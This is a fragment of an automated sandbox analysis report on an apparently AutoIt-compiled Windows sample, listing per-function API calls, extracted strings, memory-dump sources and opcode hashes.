                                                • Instruction Fuzzy Hash: C8F08C32141312EBD7252BA4EC8DEEB7739FF88302B241425F603A70A0DFB59802DB60
                                                APIs
                                                  • Part of subcall function 00ABF4EA: std::exception::exception.LIBCMT ref: 00ABF51E
                                                  • Part of subcall function 00ABF4EA: __CxxThrowException@8.LIBCMT ref: 00ABF533
                                                • __swprintf.LIBCMT ref: 00AA1EA6
                                                Strings
                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00AA1D49
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                • API String ID: 2125237772-557222456
                                                • Opcode ID: 78d4d99df7fc88b1b6035343714e2c64241d5009f683131b6c50437fcd866366
                                                • Instruction ID: a2ca3c55ecc42e3d8c50999a1887a795135127456f5f85b345ea1411f5740a38
                                                • Opcode Fuzzy Hash: 78d4d99df7fc88b1b6035343714e2c64241d5009f683131b6c50437fcd866366
                                                • Instruction Fuzzy Hash: AC914C71108201AFC724EF24C996DBABBE4EF96700F44495DF886972E2DB70ED45CB92
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 00AFB006
                                                • CharUpperBuffW.USER32(?,?), ref: 00AFB115
                                                • VariantClear.OLEAUT32(?), ref: 00AFB298
                                                  • Part of subcall function 00AE9DC5: VariantInit.OLEAUT32(00000000), ref: 00AE9E05
                                                  • Part of subcall function 00AE9DC5: VariantCopy.OLEAUT32(?,?), ref: 00AE9E0E
                                                  • Part of subcall function 00AE9DC5: VariantClear.OLEAUT32(?), ref: 00AE9E1A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                • API String ID: 4237274167-1221869570
                                                • Opcode ID: ebe5f2707765282eb3cad84d7bdc7fb39b9f422bf705c5dffdfd50c797d7b854
                                                • Instruction ID: 4d6a5229f0ca403882040cb5e99e20a2970047fafce4f370f3fda1d83562dcc4
                                                • Opcode Fuzzy Hash: ebe5f2707765282eb3cad84d7bdc7fb39b9f422bf705c5dffdfd50c797d7b854
                                                • Instruction Fuzzy Hash: 91918A306083059FCB10DF64C5809ABB7F4EF89710F14486EF99A8B3A2DB31E905CB62
                                                APIs
                                                  • Part of subcall function 00ABC6F4: _wcscpy.LIBCMT ref: 00ABC717
                                                • _memset.LIBCMT ref: 00AE5438
                                                • GetMenuItemInfoW.USER32(?), ref: 00AE5467
                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AE5513
                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00AE553D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                • String ID: 0
                                                • API String ID: 4152858687-4108050209
                                                • Opcode ID: 2dc4b17fd54ca2f61999116ef17baf23bdf212c988f3e944d6a9b7e4583c64eb
                                                • Instruction ID: 0caa582646b24e9a7684bf04320b9eaf11ed7c7c44b5daf44579fa0df785f785
                                                • Opcode Fuzzy Hash: 2dc4b17fd54ca2f61999116ef17baf23bdf212c988f3e944d6a9b7e4583c64eb
                                                • Instruction Fuzzy Hash: F85138719047819BD7149F3AE841A7BB7E9EF86318F040A2DF896D71D1DBB0CD448B62
                                                APIs
                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AE027B
                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00AE02B1
                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00AE02C2
                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AE0344
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                • String ID: DllGetClassObject
                                                • API String ID: 753597075-1075368562
                                                • Opcode ID: 1ed68bbd47c4d8ab7194b29aab8b4b5ef47dbaa018e632ec30933f62bca80eed
                                                • Instruction ID: ffbca71a2f387f18edb60a99f6630c34c73e00cf251ace804b463a74d0a9f7c7
                                                • Opcode Fuzzy Hash: 1ed68bbd47c4d8ab7194b29aab8b4b5ef47dbaa018e632ec30933f62bca80eed
                                                • Instruction Fuzzy Hash: 1D416AB1600205EFDB15CF55C985F9ABBB9EF44311B1480A9AD09DF246D7F1DA84CBA0
                                                APIs
                                                • _memset.LIBCMT ref: 00AE5075
                                                • GetMenuItemInfoW.USER32 ref: 00AE5091
                                                • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00AE50D7
                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B61708,00000000), ref: 00AE5120
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$InfoItem_memset
                                                • String ID: 0
                                                • API String ID: 1173514356-4108050209
                                                • Opcode ID: efaf268cb951a40fa1345cecd3f03baa2ed86c1d13ddefe0dd5d58110f4b9c6e
                                                • Instruction ID: 597ba8cf37a2f3c34816cac5c93c3754caa3e39f27f4540ea7248d1170bc0c52
                                                • Opcode Fuzzy Hash: efaf268cb951a40fa1345cecd3f03baa2ed86c1d13ddefe0dd5d58110f4b9c6e
                                                • Instruction Fuzzy Hash: 2841D0706047819FD720EF35E880B2AB7E8AF89728F144B5EF95697291D730E800CB62
                                                APIs
                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00AEE742
                                                • GetLastError.KERNEL32(?,00000000), ref: 00AEE768
                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00AEE78D
                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00AEE7B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                • String ID: p1#v`K$v
                                                • API String ID: 3321077145-1068180069
                                                • Opcode ID: a341dcf0e2695fab7433ce3473f0ef0380bcb724b7e5a44eda02e1739c07ba41
                                                • Instruction ID: 197d67e63975ef49a099c0fc45810f43e4d2e888a656f00a1e08314a3d39d2c2
                                                • Opcode Fuzzy Hash: a341dcf0e2695fab7433ce3473f0ef0380bcb724b7e5a44eda02e1739c07ba41
                                                • Instruction Fuzzy Hash: 0B412439200610DFCF11EF15C644A5EBBE5BF9A710B198088EA46AF3A2CB30FC41CB91
                                                APIs
                                                • CharLowerBuffW.USER32(?,?,?,?), ref: 00B00587
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: BuffCharLower
                                                • String ID: cdecl$none$stdcall$winapi
                                                • API String ID: 2358735015-567219261
                                                • Opcode ID: ea1247a9d2df53335e5a29782d7dbfb6b7806e18cb1bbd1a77e5dfbd6d9b1939
                                                • Instruction ID: de49a610be74a081593a1b74e39a1394a7add74b9e922fadc9202daab72153c2
                                                • Opcode Fuzzy Hash: ea1247a9d2df53335e5a29782d7dbfb6b7806e18cb1bbd1a77e5dfbd6d9b1939
                                                • Instruction Fuzzy Hash: 1631F270510216AFCF00EF54CE41AEEB7F5FF46314F0086A9E826A76D2DB32A905CB90
                                                APIs
                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00ADB88E
                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00ADB8A1
                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00ADB8D1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 3850602802-1403004172
                                                • Opcode ID: fe13f818cc28d8bba8bb6e438aaef73cd092beee0c7dfdf491fdadb36d60b6aa
                                                • Instruction ID: 40a68be08aaa2809e3d2e720c912b4ab2dbbdbb146b8769c3dd06d953a1dbe8e
                                                • Opcode Fuzzy Hash: fe13f818cc28d8bba8bb6e438aaef73cd092beee0c7dfdf491fdadb36d60b6aa
                                                • Instruction Fuzzy Hash: 4021F675900104FFE7149B64DD86DFE77BCDF06350B15412AF412A32E1DB794D0A9760
                                                APIs
                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00AF4401
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AF4427
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00AF4457
                                                • InternetCloseHandle.WININET(00000000), ref: 00AF449E
                                                  • Part of subcall function 00AF5052: GetLastError.KERNEL32(?,?,00AF43CC,00000000,00000000,00000001), ref: 00AF5067
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                • String ID:
                                                • API String ID: 1951874230-3916222277
                                                • Opcode ID: ac857cd09cc9db9f76148fa7c4bd795dcfec3db32d83416024a5b758fc7ae26f
                                                • Instruction ID: 8cd91ba3367006ec9cfb8318f7d7f95d59f613caa43bbb9f8169ef4e4cfb4469
                                                • Opcode Fuzzy Hash: ac857cd09cc9db9f76148fa7c4bd795dcfec3db32d83416024a5b758fc7ae26f
                                                • Instruction Fuzzy Hash: AB217CB260020CBFE7219FA4CD85EBBB6FCEB48749F10841AF209A3150EA688D059770
                                                APIs
                                                  • Part of subcall function 00ABD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00ABD1BA
                                                  • Part of subcall function 00ABD17C: GetStockObject.GDI32(00000011), ref: 00ABD1CE
                                                  • Part of subcall function 00ABD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ABD1D8
                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B0915C
                                                • LoadLibraryW.KERNEL32(?), ref: 00B09163
                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B09178
                                                • DestroyWindow.USER32(?), ref: 00B09180
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                • String ID: SysAnimate32
                                                • API String ID: 4146253029-1011021900
                                                • Opcode ID: 46f78cd9efeb3d82d383c32ed643f24e2b295356e7e762c73b8153cccc0404c0
                                                • Instruction ID: 8961cf9c256ea8486480db94832c04a8f4871da9ffef1d53a7131671bacce19d
                                                • Opcode Fuzzy Hash: 46f78cd9efeb3d82d383c32ed643f24e2b295356e7e762c73b8153cccc0404c0
                                                • Instruction Fuzzy Hash: 64216D71200206BBEF204E64DC89EBB3BEDEF99364F104699F954A31E2D771DC52A760
                                                APIs
                                                • GetStdHandle.KERNEL32(0000000C), ref: 00AE9588
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AE95B9
                                                • GetStdHandle.KERNEL32(0000000C), ref: 00AE95CB
                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00AE9605
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CreateHandle$FilePipe
                                                • String ID: nul
                                                • API String ID: 4209266947-2873401336
                                                • Opcode ID: 69724573b386840f7fc4a881c60859f4f49fdef1cf54c715cf5852815ed60db3
                                                • Instruction ID: dfb1ff5340c5ceba77cd687bac5d34240e21d2e9cf4dfec8f84414d47a250441
                                                • Opcode Fuzzy Hash: 69724573b386840f7fc4a881c60859f4f49fdef1cf54c715cf5852815ed60db3
                                                • Instruction Fuzzy Hash: 3B216070600345ABDB219F6ADC05A9B7BF8AF49724F204A19FDA5E72D0DB70D949CB20
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 00AE9653
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AE9683
                                                • GetStdHandle.KERNEL32(000000F6), ref: 00AE9694
                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00AE96CE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CreateHandle$FilePipe
                                                • String ID: nul
                                                • API String ID: 4209266947-2873401336
                                                • Opcode ID: eed0ae90e04fb5861a18098bd7bfbd4ec4588ed6c147ac4ec2c16c9d7ce3d0e2
                                                • Instruction ID: 960565abc2ffe3f304ad433f558e81223f189a42c8338ac0ee938faf6b3f3c4f
                                                • Opcode Fuzzy Hash: eed0ae90e04fb5861a18098bd7bfbd4ec4588ed6c147ac4ec2c16c9d7ce3d0e2
                                                • Instruction Fuzzy Hash: 99217F716003459BDB249F6ADC45E9BB7E8AF45724F200A1AFCA1E72D1EB70D841CB50
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 00AEDB0A
                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00AEDB5E
                                                • __swprintf.LIBCMT ref: 00AEDB77
                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,00B3DC00), ref: 00AEDBB5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                • String ID: %lu
                                                • API String ID: 3164766367-685833217
                                                • Opcode ID: 67b1394317515fa8586c19300282d7fe733cae2f2d87c9ad859c2ba9252f0b46
                                                • Instruction ID: f619b2adc151ae064802453a58cc3beea49da852e3e3189a3367c4346b09f71f
                                                • Opcode Fuzzy Hash: 67b1394317515fa8586c19300282d7fe733cae2f2d87c9ad859c2ba9252f0b46
                                                • Instruction Fuzzy Hash: FC219535A00248AFDB10EF65CE85EEEB7F8EF49714B1140A9F505E7291DB71EA41CB60
                                                APIs
                                                  • Part of subcall function 00ADC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ADC84A
                                                  • Part of subcall function 00ADC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ADC85D
                                                  • Part of subcall function 00ADC82D: GetCurrentThreadId.KERNEL32 ref: 00ADC864
                                                  • Part of subcall function 00ADC82D: AttachThreadInput.USER32(00000000), ref: 00ADC86B
                                                • GetFocus.USER32 ref: 00ADCA05
                                                  • Part of subcall function 00ADC876: GetParent.USER32(?), ref: 00ADC884
                                                • GetClassNameW.USER32(?,?,00000100), ref: 00ADCA4E
                                                • EnumChildWindows.USER32(?,00ADCAC4), ref: 00ADCA76
                                                • __swprintf.LIBCMT ref: 00ADCA90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                • String ID: %s%d
                                                • API String ID: 3187004680-1110647743
                                                • Opcode ID: 81c3e09e4c6ddf43a7f82255520c67aaa7d4168e842b21068720858151d6041a
                                                • Instruction ID: f223d20d442179de08c391f2ef3a8f3948ff6e8023d8fe6f63f7be4f4d79170a
                                                • Opcode Fuzzy Hash: 81c3e09e4c6ddf43a7f82255520c67aaa7d4168e842b21068720858151d6041a
                                                • Instruction Fuzzy Hash: 3F11E4756002067BCB11BFA08D89FED7779AF45710F404066FE09AB282DB709506DB70
                                                APIs
                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B019F3
                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B01A26
                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B01B49
                                                • CloseHandle.KERNEL32(?), ref: 00B01BBF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                • String ID:
                                                • API String ID: 2364364464-0
                                                • Opcode ID: 0572083ee37cb2011bc4281f990fc301db0a38474c23ec3535bc39632047ef5a
                                                • Instruction ID: 6e327eea47f3df4e1be07e4993de2627f429baa1e5ac29c370afa63bc3cfae65
                                                • Opcode Fuzzy Hash: 0572083ee37cb2011bc4281f990fc301db0a38474c23ec3535bc39632047ef5a
                                                • Instruction Fuzzy Hash: 57814370600214ABDF14DF64C996BADBBE9FF44720F148499F905AF3C2DBB5A941CB90
                                                APIs
                                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B0E1D5
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00B0E20D
                                                • IsDlgButtonChecked.USER32(?,00000001), ref: 00B0E248
                                                • GetWindowLongW.USER32(?,000000EC), ref: 00B0E269
                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B0E281
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend$ButtonCheckedLongWindow
                                                • String ID:
                                                • API String ID: 3188977179-0
                                                • Opcode ID: b35c8f2a7c58d5e9fcdd9eef56e6aa896e1a0dfc4c9ff1fdeb8c91f5428624b0
